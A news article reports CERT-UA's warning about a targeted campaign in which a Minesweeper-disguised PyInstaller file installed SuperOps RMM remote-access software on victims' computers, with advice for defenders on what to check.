Ukrainian CERT warns of attacks with Minesweeper
The CERT-UA warns of targeted attacks to gain unauthorized access to computers. The perpetrators use Minesweeper as bait.
Games bring malware with them.
(Image: Bild erstellt mit KI in Bing Designer durch heise online / dmk)
The CERT of Ukraine (CERT-UA) warns of targeted attacks with the aim of gaining unauthorized access to computers. European and US financial and insurance organizations may also have been targeted by the attackers.
The attacks were carried out between February and March of this year and were geographically widespread. During the analysis of a cyberattack on a Ukrainian organization, CERT-UA and CSIRT-NBU (Cyber Security Incident Response Team in the banking system of Ukraine) discovered that the attackers wanted to anchor a legitimate remote management software called SuperOps RMM.
Gateway email with Minesweeper to employees
In the analyzed case, the perpetrators had sent an email with a link to Dropbox, which referred to an executable SCR file 33 MB in size. This file was created with PyInstaller and contained, among other things, legitimate Python code for the game Minesweeper - and a 28 MB base64-encoded string. In addition, another part of the software downloads Python code from the anotepad.com service, decodes it and finally executes it.
The downloaded code calls the create_license_ver function of Saper - the name of the Python minesweeper variant - and passes the 28 MB string and a base64-encoded string from the downloaded script as arguments. At the end, this produces a ZIP file that is provided with a static password and contains an MSI installer with the SuperOps RMM software. This is then executed and provides the attackers with unauthorized access to the computer from the network.
During further investigations into the attackers' approach, the IT specialists found five other files similar to the SCR file, which contained the names of financial and insurance institutions in Europe and the USA. These were probably also attacked. However, CERT-UA does not provide the specific names. However, the CERT-UA analysis lists Indicators of Compromise (IOCs) that IT managers can use to investigate whether machines in their networks are affected. Network traffic should also be checked to see if it contains unexpected connections to *.superops.com or *.superops.ai.
Ukraine's CERT is very active. A month ago, for example, it described attacks on the country's critical infrastructure (KRITIS). According to findings at the time, the Russian cyber gang Sandworm had planned cyber sabotage on around 20 KRITIS objects.
(dmk)